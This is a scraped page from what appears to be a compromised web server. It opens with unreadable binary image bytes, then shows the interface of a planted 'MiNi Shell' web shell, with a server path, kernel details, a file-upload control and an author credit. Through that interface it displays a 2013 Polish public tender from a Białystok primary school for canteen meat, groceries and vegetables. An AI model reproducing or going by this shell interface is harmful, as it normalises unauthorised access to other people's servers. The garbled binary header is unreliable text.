JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130626/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130626/245756-N-2013.html

<p class="kh_header"><b>Białystok: Przetarg nieograniczony na dostawę mięsa, wędlin, drobiu oraz różnych artykułów spożywczych do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 245756 - 2013; data zamieszczenia: 26.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 47 im. Jana Klemensa Branickiego , ul. Palmowa 28, 15-795 Białystok, woj. podlaskie, tel. 085 65 34 378, faks 085 65 31 981.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę mięsa, wędlin, drobiu oraz różnych artykułów spożywczych do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy do Szkoły Podstawowej Nr 47 im. Jana Klemensa Branickiego w Białymstoku mięsa, wędlin, drobiu oraz różnych artykułów spożywczych do stołówki szkolnej:
Część I. mięso.
1.		Łopatka   w/p , b/k	kg	2000
2.		Schab w/p, z/k	kg	900
3.		Udziec wołowy b/k	kg	400
4.		Szynka wieprzowa b/k	kg	400
5.		Kiełbasa biała surowa	kg	200
6.		Kości schabowe	kg	600
7.		Karkówka w/p, b/k	kg	350
8.		Boczek wędzony luz b/ż	kg	100
Część II.   Wędliny oraz drób
1.		Kiełbasa typu podwawelska zaw. mięsa nie mniej niż 85%	kg	300
2.		Udziec z kurczaka (1szt ok. 200g)	kg	800
3.		Podudzie z kurczaka gat. I (1szt ok. 200g)	kg	400
4.		Porcje rosołowe drobiowe	kg	300
5.		Filet indyczy	kg	450
6.		Filet z kurczaka	kg	800
7.		Mięso gulaszowe drobiowe gat. I	kg	300
8.		Smalec (kostka 200g)	kg	85
Część III.  Różne produkty spożywcze
1.		Cukier kryształ	kg	900
2.		Cukier waniliowy 32g	szt.	50
3.		Czekolada mleczna 100g(min.30% kakao)	szt.	1800
4.		Czosnek suszony mielony 1kg	kg	7
5.		Kasza gryczana prażona	kg	90
6.		Kasza jęczmienna -średnia	kg	90
7.		Koncentrat pomidorowy 30% słoik 1kg	szt.	150
8.		Kukurydza konserwowa 2650g	szt.	65
9.		Liść laurowy 50g	szt.	15
10.		Majeranek 100g	szt.	25
11.		Majonez wiadro 5kg.	szt.	60
12.		Makaron kokardki skład m.in. mąka z pszenicy durum, zawartość białka nie mniej niż 13,5% na 100g, opakowanie 2kg.	szt.	150
13.		Makaron nitka cięta skład: m.in.: mąka z pszenicy durum, zawartość białka nie mniej niż13,5% na 100g, opakowanie 2kg.	szt	150
14.		Makaron świderek skład m.in.: mąka z pszenicy durum, zawartość białka nie mniej niż 13,5% na 100g,opakowanie 2kg.	szt	200
15.		Mąka tortowa pszenna typ 450	kg	600
16.		Mąka ziemniaczana	kg	30
17.		Ocet spirytusowy 10%  0,5l 	szt.	150
18.		Olej rzepakowy z pierwszego tłoczenia 1l 	szt.	500
19.		Oregano 10g 	szt	100
20.		Papryka ostra mielona  1kg.	szt	3
21.		Pieprz naturalny czarny mielony 1kg.	szt.	10
22.		Pieprz ziołowy 1kg.	szt	10
23.		Przyprawa kebab	kg	15
24.		Przyprawa uniwersalna, warzywna do potraw	kg	180
25.		Margaryna płynna 3,7l do pieca konwekcyjno-parowego	szt.	50
26.		Rosół drobiowy sypki 1kg.	kg	40
27.		Ryż paraboliczny	kg	500
28.		Sól jodowana warzona 1kg.	kg	400
29.		Szczaw konserwowy siekany 900g	szt	540
30.		Sos borowikowo-pieczarkowy 900g.	szt.	15
31.		Sos napoli 900g.	szt.	5
32.		Sos ogrodowy 900g	szt.	30
33.		Sos pieczeniowy 900g	szt.	12
34.		Sos słodko-kwaśny 520g.(słoik)	szt.	200
35.		Zasmażka jasna 900g	szt.	50
36.		Ziele angielskie 500g	szt.	10
37.		Zioła prowansalskie 10g.	szt.	20
38.		Zupa barszcz biały 1kg	szt	30
39.		Zupa barszcz czerwony 1kg	szt.	5
40.		Zupa krem pieczarkowa 1kg.	szt.	12
41.		Zupa żurek 1kg.	szt.	30
42.		Kasza manna 1kg.	kg	20
43.		Napoje w proszku typu ALSA 1kg.	szt.	500
44.		Kwasek cytrynowy 500g.	szt.	20
45.		Brzoskwinie krojone 4250g.	szt.	16
46.		Fix do gulaszu 1kg.	szt.	7
47.		Przyprawa typu Delikat 600g do drobiu lub równoważna	szt	20
48.		Jogurt naturalny, kubek 350g	szt.	500
49.		Jogurt owocowy butelka 250g	szt.	4000
50.		Masło śmietankowe 200g	szt.	700
51.		Mleko 2% butelka 1l	szt.	120
52.		Ser żółty typu Gouda	kg	150
53.		Serek homogenizowany 135g -140g	szt.	2400
54.		Śmietana 18% worek 5l	szt.	70
55.		Śmietana 18% kubek 400g.	szt.	1700
56.		Twaróg półtłusty krajanka	kg	700
57.		Baton typu snickers, mars lub równoważny	szt	2400
Częśc IV   Warzywa, owoce i jaja
1.		Banan (1 szt. ok. 200g)	kg	840
2.		Botwina pęczek	szt.	40
3.		Buraki	kg	1200
4.		Cebula czerwona	kg	30
5.		Cebula zwykła	kg	330
6.		Czosnek główka	szt.	10
7.		Fasola średnia typu Jaś	kg	180
8.		Groch połówki	kg	40
9.		Gruszka gat. I (1 szt. ok. 200g)	kg	1000
10.		Jabłka o smaku gruszkowym gatunek I
 (1 szt. ok. 220g)	
kg	
1500
11.		Jaja kurze	kg	700
12.		Kapusta biała (IX - IV)	kg	1400
13.		Kapusta włoska	kg	220
14.		Kapusta biała młoda (V - V)	kg	100
15.		Kapusta czerwona	kg	190
16.		Kapusta kiszona	kg	860
17.		Kapusta pekińska 	kg	315
18.		Koper pęczek	kg	220
19.		Marchew	kg	1650
20.		Natka pietruszki pęczek	szt	90
21.		Ogórek kiszony	kg	500
22.		Ogórek świeży - długi	kg	800
23.		Papryka świeża czerwona	kg	300
24.		Pieczarki	kg	220
25.		Pietruszka	kg	600
26.		Pomarańcza (1 szt. ok. 280g)	kg	2000
27.		Pomidor	kg	420
28.		Por	kg	110
29.		Rzodkiewka pęczek	szt.	250
30.		Sałata karbowana lodowa	szt.	380
31.		Seler	kg	520
32.		Szczypior pęczek	szt.	65
33.		Ziemniaki gat. I (odmiana biała)	kg	21000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.80.00.00-6, 15.50.00.00-3, 03.22.00.00-9, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca winien złożyć stosowne oświadczenie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów potwierdzających spełnienie warunków. Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art. 26 ust.2b ustawy Prawo zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę ceny oferty brutto, wyszczególnionej w §4 ust. 1 wzoru mowy, w przypadku zmiany ustawowej stawki podatku VAT na asortyment będący przedmiotem umowy. Powyższe może nastąpić na podstawie pisma Wykonawcy wskazującego podstawę prawną uzasadniającą dokonanie takiej zmiany. Zmiany umowy w zakresie, o którym mowa powyżej wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp47.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 47 im. Jana Klemensa Branickiego w Białymstoku
ul. Palmowa 28
15-795 Białystok
Pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2013 godzina 09:00, miejsce: Szkoła Podstawowa Nr 47 im. Jana Klemensa Branickiego w Białymstoku
ul. Palmowa 28
15-795 Białystok
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> mięso.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest asortyment wyszczególniony w poniższej tabeli.
L.p.	Nazwa przedmiotu	J.m	Ilość
1.		Łopatka   w/p , b/k	kg	2000
2.		Schab w/p, z/k	kg	900
3.		Udziec wołowy b/k	kg	400
4.		Szynka wieprzowa b/k	kg	400
5.		Kiełbasa biała surowa	kg	200
6.		Kości schabowe	kg	600
7.		Karkówka w/p, b/k	kg	350
8.		Boczek wędzony luz b/ż	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wędliny oraz drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest asortyment wyszczególniony w poniższej tabeli.
L.p.	Nazwa przedmiotu	J.m	Ilość
1.		Kiełbasa typu podwawelska zaw. mięsa nie mniej niż 85%	kg	300
2.		Udziec z kurczaka (1szt ok. 200g)	kg	800
3.		Podudzie z kurczaka gat. I (1szt ok. 200g)	kg	400
4.		Porcje rosołowe drobiowe	kg	300
5.		Filet indyczy	kg	450
6.		Filet z kurczaka	kg	800
7.		Mięso gulaszowe drobiowe gat. I	kg	300
8.		Smalec (kostka 200g)	kg	85.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest asortyment wyszczególniony w poniższej tabeli.
L.p.	Nazwa przedmiotu	J.m	Ilość
1.		Cukier kryształ	kg	900
2.		Cukier waniliowy 32g	szt.	50
3.		Czekolada mleczna 100g(min.30% kakao)	szt.	1800
4.		Czosnek suszony mielony 1kg	kg	7
5.		Kasza gryczana prażona	kg	90
6.		Kasza jęczmienna -średnia	kg	90
7.		Koncentrat pomidorowy 30% słoik 1kg	szt.	150
8.		Kukurydza konserwowa 2650g	szt.	65
9.		Liść laurowy 50g	szt.	15
10.		Majeranek 100g	szt.	25
11.		Majonez wiadro 5kg.	szt.	60
12.		Makaron kokardki skład m.in. mąka z pszenicy durum, zawartość białka nie mniej niż 13,5% na 100g, opakowanie 2kg.	szt.	150
13.		Makaron nitka cięta skład: m.in.: mąka z pszenicy durum, zawartość białka nie mniej niż13,5% na 100g, opakowanie 2kg.	szt	150
14.		Makaron świderek skład m.in.: mąka z pszenicy durum, zawartość białka nie mniej niż 13,5% na 100g,opakowanie 2kg.	szt	200
15.		Mąka tortowa pszenna typ 450	kg	600
16.		Mąka ziemniaczana	kg	30
17.		Ocet spirytusowy 10%  0,5l 	szt.	150
18.		Olej rzepakowy z pierwszego tłoczenia 1l 	szt.	500
19.		Oregano 10g 	szt	100
20.		Papryka ostra mielona  1kg.	szt	3
21.		Pieprz naturalny czarny mielony 1kg.	szt.	10
22.		Pieprz ziołowy 1kg.	szt	10
23.		Przyprawa kebab	kg	15
24.		Przyprawa uniwersalna, warzywna do potraw	kg	180
25.		Margaryna płynna 3,7l do pieca konwekcyjno-parowego	szt.	50
26.		Rosół drobiowy sypki 1kg.	kg	40
27.		Ryż paraboliczny	kg	500
28.		Sól jodowana warzona 1kg.	kg	400
29.		Szczaw konserwowy siekany 900g	szt	540
30.		Sos borowikowo-pieczarkowy 900g.	szt.	15
31.		Sos napoli 900g.	szt.	5
32.		Sos ogrodowy 900g	szt.	30
33.		Sos pieczeniowy 900g	szt.	12
34.		Sos słodko-kwaśny 520g.(słoik)	szt.	200
35.		Zasmażka jasna 900g	szt.	50
36.		Ziele angielskie 500g	szt.	10
37.		Zioła prowansalskie 10g.	szt.	20
38.		Zupa barszcz biały 1kg	szt	30
39.		Zupa barszcz czerwony 1kg	szt.	5
40.		Zupa krem pieczarkowa 1kg.	szt.	12
41.		Zupa żurek 1kg.	szt.	30
42.		Kasza manna 1kg.	kg	20
43.		Napoje w proszku typu ALSA 1kg.	szt.	500
44.		Kwasek cytrynowy 500g.	szt.	20
45.		Brzoskwinie krojone 4250g.	szt.	16
46.		Fix do gulaszu 1kg.	szt.	7
47.		Przyprawa typu Delikat 600g do drobiu lub równoważna	szt	20
48.		Jogurt naturalny, kubek 350g	szt.	500
49.		Jogurt owocowy butelka 250g	szt.	4000
50.		Masło śmietankowe 200g	szt.	700
51.		Mleko 2% butelka 1l	szt.	120
52.		Ser żółty typu Gouda	kg	150
53.		Serek homogenizowany 135g -140g	szt.	2400
54.		Śmietana 18% worek 5l	szt.	70
55.		Śmietana 18% kubek 400g.	szt.	1700
56.		Twaróg półtłusty krajanka	kg	700
57.		Baton typu snickers, mars lub równoważny	szt	2400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa, owoce i jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest asortyment wyszczególniony w poniższej tabeli.
L.p.	Nazwa przedmiotu	J.m	Ilość
1.		Banan (1 szt. ok. 200g)	kg	840
2.		Botwina pęczek	szt.	40
3.		Buraki	kg	1200
4.		Cebula czerwona	kg	30
5.		Cebula zwykła	kg	330
6.		Czosnek główka	szt.	10
7.		Fasola średnia typu Jaś	kg	180
8.		Groch połówki	kg	40
9.		Gruszka gat. I (1 szt. ok. 200g)	kg	1000
10.		Jabłka o smaku gruszkowym gatunek I
 (1 szt. ok. 220g)	
kg	
1500
11.		Jaja kurze	kg	700
12.		Kapusta biała (IX - IV)	kg	1400
13.		Kapusta włoska	kg	220
14.		Kapusta biała młoda (V - V)	kg	100
15.		Kapusta czerwona	kg	190
16.		Kapusta kiszona	kg	860
17.		Kapusta pekińska 	kg	315
18.		Koper pęczek	kg	220
19.		Marchew	kg	1650
20.		Natka pietruszki pęczek	szt	90
21.		Ogórek kiszony	kg	500
22.		Ogórek świeży - długi	kg	800
23.		Papryka świeża czerwona	kg	300
24.		Pieczarki	kg	220
25.		Pietruszka	kg	600
26.		Pomarańcza (1 szt. ok. 280g)	kg	2000
27.		Pomidor	kg	420
28.		Por	kg	110
29.		Rzodkiewka pęczek	szt.	250
30.		Sałata karbowana lodowa	szt.	380
31.		Seler	kg	520
32.		Szczypior pęczek	szt.	65
33.		Ziemniaki gat. I (odmiana biała)	kg	21000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com